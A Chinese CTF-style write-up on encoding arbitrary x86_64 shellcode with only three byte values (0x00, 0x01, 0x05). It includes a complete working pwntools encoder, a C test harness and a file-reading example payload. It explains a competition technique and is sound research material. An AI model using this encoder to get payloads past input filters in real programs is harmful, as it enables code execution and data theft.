僅用三種字符實現 x86_64 架構的任意 shellcode

前言
今年(2021) DEFCON 決賽出了一道有意思的 KoH 題(shoow-your-shell),用 shellcode 讀取 secret 文件內容并輸出,比誰用的字符更少,字符數相同時比誰的長度更短。
有隊伍僅用 3 個字節就輸出了 secret 的內容,但這應該是出題的失誤,利用 read 系統調用二次讀入的字節也應該屬于 payload 的一部分,全部加起來再算分更合理。如果在運行 shellcode 之前,將所有寄存器的值都設置為 0xdeadbeefdeadbeef 則可以避免此情況。
有隊伍僅用 3 種字符就實現 ROP 輸出了 secret 的內容,非常的強大。如果二進制開啟了 PIE,是否還能僅用 3 種字符就實現輸出 secret 內容的 shellcode 呢?
在 redpwnCTF 2021 中有一道叫 gelcode-2 的 shellcode 題,僅用小于等于 0x05 的字符就實現讀取 flag 的 shellcode。
其實,僅用 0x00、0x01、0x05 這三種字符,即可實現 x86_64 架構的任意 shellcode。
三種字符shellcode的基本原理
將 shellcode 進行分段
每段指令不超過 4 個字節(如果多出來的字節是 0x00、0x01、0x05 也可以接受),小于 4 字節的可以用 nop 等無影響的指令進行補充。
在編寫時 shellcode 盡量不要使用 rax 寄存器(因為構造 shellcode 時要用到),對于 syscall 必須用到 rax 的則需要放在同一組,以 exit(0) 系統調用為例:
6a 3c 6a 00 push 60; push 0; # 第 1 組5f 58 0f 05 pop rdi; pop rax; syscall; # 第 2 組
大于 4 字節的指令(且多出來的字節不是 0x00、0x01、0x05 的)盡量換種寫法,對于實在換不了的,下文另外討論。
add eax, 0xXXXXXXXX 指令
add eax, 0xXXXXXXXX 指令是以 0x05 開頭,緊跟著 4 字節的操作數(小端序),舉例:
05 00 05 00 01 add eax, 0x01000500
在知道當前 eax 值的情況下,就可以通過 N 條 add eax, 0xXXXXXXXX 指令,將 eax 加成任意想要的值。
為了減少指令的數量,4 個字節可以并行地做加法,相差大于等于 5 的加 5,相差大于等于 1 的加 1,剩下相等的加 0。具體算法如下:
def next_step(value): """ 每個字節每次加 5、1 或 0 """ n = 0 for i in range(4): if (value >> (i * 8)) & 0xff >= 5: n |= (5 << (i * 8)) elif (value >> (i * 8)) & 0xff >= 1: n |= (1 << (i * 8)) return n def add_eax(value): """ 將 eax 加上指定的值 """ payload = b'' while value > 0: n = next_step(value) payload += b'\x05' + p32(n) value -= n return payload
add [rip], eax 指令
add [rip], eax 指令僅含有 0x00、0x01、0x05 三種字符,并且可以將接下來 4 字節的指令加上 eax 的值,從而實現任意 shellcode 的構造。
01 05 00 00 00 00 add [rip], eax # 將 eax 的值加到接下來 4 字節的指令中00 00 00 00 # 4 字節的占位指令(加上 eax 的值 就是需要構造的目標指令)
當執行完 add [rip], eax 指令之后,下一條執行的指令就是 eax 加上占位數值所代表的指令。
除了用 4 字節的 0x00 占位外,還可以使用 0x01 和 0x05 來占位,這樣可以使得整體 shellcode 的長度更短。
上文說到可以利用 0x00、0x01、0x05 三種字符構造出任意的 eax 值,也就是說,可以構造出任意 4 字節的目標指令。
完整的轉換算法如下:
def asm_015(shellcode): """ 將 shellcode 轉換成 0x00、0x01、0x05 三種字符 """ # 不足 4 字節的目標指令補充 nop 指令 if len(shellcode) < 4: shellcode = shellcode.ljust(4, b'\x90') # 特殊處理超過 4 字節且含有其他字符的目標指令 if len(shellcode) > 4: for c in shellcode[4:]: if c not in (0, 1, 5): return asm_long_015(shellcode) # 當前 eax 距離目標指令的差值 global current_eax eax_offset = u32(shellcode[:4]) - current_eax if eax_offset < 0: eax_offset += 0x100000000 # 預留第一步的值,以減少 shellcode 的總體長度 reserved = next_step(eax_offset) eax_offset -= reserved # 設置 eax 為目標指令 payload = add_eax(eax_offset) current_eax = (current_eax + eax_offset) & 0xffffffff # 將 eax 加到目標指令 payload += b'\x01\x05\x00\x00\x00\x00' # add [rip], eax # 目標指令預留的值 payload += p32(reserved) # 目標指令超出 4 字節的部分(全是 0x00、0x01、0x05 之一) payload += shellcode[4:] return payload
處理大于4字節的指令
當 shellcode 某組指令必須大于 4 字節時,如果多出的字節全是 0x00、0x01、0x05 三種字符之一,那直接加在后面即可。如果多出的字節不全是 0x00、0x01、0x05 三種字符之一,就需要特殊處理了。
一種解決方案是:將完整的指令寫在某處 rwx 的內存,利用 call 指令跳過去執行,在最后加一個 ret 指令返回。
利用下面的模式就可以將 shellcode 完整地寫在 rbp 指向的內存:
66 bb 34 12 mov bx, 0x1234 # 第 1 組將 bx 設置為 shellcode 第 1、2 字節66 89 5d 00 mov [rbp + 0x0], bx # 第 2 組將 bx 寫入 rbp 指向的位置(偏移為 0)66 bb 78 56 mov bx, 0x5678 # 第 3 組將 bx 設置為 shellcode 第 3、4 字節66 89 5d 02 mov [rbp + 0x2], bx # 第 4 組將 bx 寫入 rbp 指向的位置(偏移為 2) 如果指令長度超過 0x80,就需要稍微調整一下此模式。但是將指令拆成 4 字節一組可以使整體 shellcode 長度更短,因此沒必要這樣做。
完整的轉換算法如下:
def asm_long_015(shellcode): """ 將超長的 shellcode 轉換成 0x00、0x01、0x05 三種字符(會破壞 rbp 寄存器) """ # 添加 ret 指令,并補充為 2 的整數倍長度 shellcode += b'\xC3' if len(shellcode) % 2 == 1: shellcode += b'\x90' # 暫不支持大于等于 0x80 字節的超長指令,盡量將指令拆成 4 字節一組以減少 shellcode 長度 assert len(shellcode) < 0x80 # 將 rbx 入棧,往 rbp 處構造出超長 shellcode payload = asm_015(b'\x53\x48\x8D\x2D\x00\x00\x00\x00') # push rbx; lea rbp, [rip] for i in range(0, len(shellcode), 2): payload += asm_015(b'\x66\xBB' + shellcode[i:i+2]) # mov bx, 0xXXXX payload += asm_015(b'\x66\x89\x5D' + bytes([i])) # mov [rbp + i], bx # 將 rbx 出棧,調用 rbp 處的超長 shellcode payload += asm_015(b'\x5B\xFF\xD5\x90') # pop rbx; call rbp; nop return payload
處理syscall的返回值
調用 syscall 之后,返回值會寫入 rax 寄存器,這會影響到后續 shellcode 的構造。
如果事先知道 syscall 會返回什么值,那只要更新當前 eax 的值即可。
如果不知道 syscall 會返回什么值,那就需要在 syscall 那組指令中設置好 eax 的值,舉例:
58 pop rax0f 05 syscallb8 00 00 00 00 mov eax, 0x0
前 4 個字節可以通過上文說到的方式構造出來,后面跟著 4 個 0x00,也可以換成 0x01 或 0x05(某些情況下可以減少整體 shellcode 的長度)。
測試shellcode的程序
這是本文測試 shellcode 的二進制程序源代碼,用來驗證 0x00、0x01、0x05 三個字符可以組成任意的 shellcode。
- 首先 mmap 隨機的地址,使 shellcode 運行時 rip 寄存器的值是未知的。
- 然后將所有寄存器的值設置為 0xdeadbeefdeadbeef,使 shellcode 不依賴寄存器的初始值。
- 最后編譯時開啟 PIE,使 shellcode 不依賴程序的 gadget。
#include #include #include #include #include #include #include #include
char init_code[] = {0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBB, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBA, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBF, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBE, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBA, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBB, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBC, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBD, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBE, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x49, 0xBF, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBD, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0xBC, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE};
int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0);
int ufd = open("/dev/urandom", O_RDONLY); assert(ufd != -1); void *addr = 0; read(ufd, &addr, 8); close(ufd); assert(addr > 0); *((unsigned long *)&addr) &= 0xffffff000;
assert(mmap(addr, 0x100000, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) == addr); memcpy(addr, init_code, sizeof(init_code));
unsigned int length = 0; printf("shellcode length: "); assert(scanf("%u", &length) == 1);
unsigned int n = 0; void *p = addr + sizeof(init_code); while (length > 0) { ssize_t n = read(0, p, length); assert(n > 0); p += n; length -= n; }
return ((int (*)(void))addr)();}
gcc -pie -o test_shellcode test_shellcode.c
完整的shellcode生成腳本
將 shellcode 適當地分組,就可以用腳本直接轉換成 0x00、0x01、0x05 三種字符。
備注:適當調整 shellcode 的順序,可以獲得更短的 shellcode 長度。
#!/usr/bin/env python3
from pwn import *
current_eax = 0xdeadbeef
def next_step(value): """ 每個字節每次加 5、1 或 0 """ n = 0 for i in range(4): if (value >> (i * 8)) & 0xff >= 5: n |= (5 << (i * 8)) elif (value >> (i * 8)) & 0xff >= 1: n |= (1 << (i * 8)) return n
def add_eax(value): """ 將 eax 加上指定的值 """ payload = b'' while value > 0: n = next_step(value) payload += b'\x05' + p32(n) value -= n return payload
def asm_015(shellcode): """ 將 shellcode 轉換成 0x00、0x01、0x05 三種字符 """ # 不足 4 字節的目標指令補充 nop 指令 if len(shellcode) < 4: shellcode = shellcode.ljust(4, b'\x90') # 特殊處理超過 4 字節且含有其他字符的目標指令 if len(shellcode) > 4: for c in shellcode[4:]: if c not in (0, 1, 5): return asm_long_015(shellcode) # 當前 eax 距離目標指令的差值 global current_eax eax_offset = u32(shellcode[:4]) - current_eax if eax_offset < 0: eax_offset += 0x100000000 # 預留第一步的值,以減少 shellcode 的總體長度 reserved = next_step(eax_offset) eax_offset -= reserved # 設置 eax 為目標指令 payload = add_eax(eax_offset) current_eax = (current_eax + eax_offset) & 0xffffffff # 將 eax 加到目標指令 payload += b'\x01\x05\x00\x00\x00\x00' # add [rip], eax # 目標指令預留的值 payload += p32(reserved) # 目標指令超出 4 字節的部分(全是 0x00、0x01、0x05 之一) payload += shellcode[4:] return payload
def asm_long_015(shellcode): """ 將超長的 shellcode 轉換成 0x00、0x01、0x05 三種字符(會破壞 rbp 寄存器) """ # 添加 ret 指令,并補充為 2 的整數倍長度 shellcode += b'\xC3' if len(shellcode) % 2 == 1: shellcode += b'\x90' # 暫不支持大于等于 0x80 字節的超長指令,盡量將指令拆成 4 字節一組以減少 shellcode 長度 assert len(shellcode) < 0x80 # 將 rbx 入棧,往 rbp 處構造出超長 shellcode payload = asm_015(b'\x53\x48\x8D\x2D\x00\x00\x00\x00') # push rbx; lea rbp, [rip] for i in range(0, len(shellcode), 2): payload += asm_015(b'\x66\xBB' + shellcode[i:i+2]) # mov bx, 0xXXXX payload += asm_015(b'\x66\x89\x5D' + bytes([i])) # mov [rbp + i], bx # 將 rbx 出棧,調用 rbp 處的超長 shellcode payload += asm_015(b'\x5B\xFF\xD5\x90') # pop rbx; call rbp; nop return payload
def exploit(r): # 修復棧 payload = asm_015(asm('lea rsp, [rip]')) payload += asm_015(asm('and rsp, 0xfffffffffffffff0'))
# secret 文件路徑 payload += asm_015(asm('mov bx, 0x0000')) payload += asm_015(asm('shl rbx, 16')) payload += asm_015(asm('mov bx, 0x7465')) payload += asm_015(asm('shl rbx, 16')) payload += asm_015(asm('mov bx, 0x7263')) payload += asm_015(asm('shl rbx, 16')) payload += asm_015(asm('mov bx, 0x6573'))
# int open(const char *pathname, int flags) payload += asm_015(asm('push rbx; mov rdi, rsp')) # pathname payload += asm_015(asm('push 2; push 0')) # sys_open, flags payload += asm_015(asm('pop rsi; pop rax; syscall')) global current_eax current_eax = 3 # 返回值為3,修正當前 eax
# ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count) payload += asm_015(asm('push 0x7f; pop r10')) # count payload += asm_015(asm('push 40; push 0')) # sys_sendfile, offset payload += asm_015(asm('push 3; push 1')) # in_fd, out_fd payload += asm_015(asm('pop rdi; pop rsi; pop rdx; nop')) payload += asm_015(asm('pop rax; syscall; mov eax, 0')) # 因為 flag 長度未知,因此將 eax 置 0 current_eax = 0 # 修正當前 eax
# 超長 shellcode 測試:預期正常調用 getuid()、getgid() 并正常返回 payload += asm_015(asm('mov rax, 102; syscall; mov rax, 104; syscall; mov eax, 0')) current_eax = 0 # 修正當前 eax
# void _exit(int status) payload += asm_015(asm('push 60; push 0')) # sys_exit, status payload += asm_015(asm('pop rdi; pop rax; syscall'))
# 驗證 shellcode log.info('payload %s, length: %d', set(payload), len(payload)) r.sendlineafter(b'shellcode length: ', str(len(payload)).encode('utf8')) pause() r.send(payload)
# 預期輸出 secret 文件內存,并正常退出 print(r.recvallS()) r.close()
def main(): context.clear(arch='amd64', os='linux') r = process('./test_shellcode') exploit(r)
if __name__ == '__main__': main()
利用strace調試syscall的小技巧
在利用腳本發送 payload 前先 pause(),然后在另一個終端執行 strace 命令,回到 pause() 的終端按任意鍵繼續,然后在 strace 的終端就能直觀地看到是否按預期調用 syscall 了:
$ strace -p `pidof test_shellcode`strace: Process 22404 attachedread(0, "\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\5\1\5\5"..., 10046) = 10046open("secret", O_RDONLY) = 3sendfile(1, 3, NULL, 127) = 56getuid() = 0getgid() = 0exit(0) = ?+++ exited with 0 +++
參考
redpwnCTF 2021 – gelcode-2 (pwn)
DEFCON 29 FINAL shooow-your-shell 總結
(點擊閱讀原文可查看參考文章詳情~)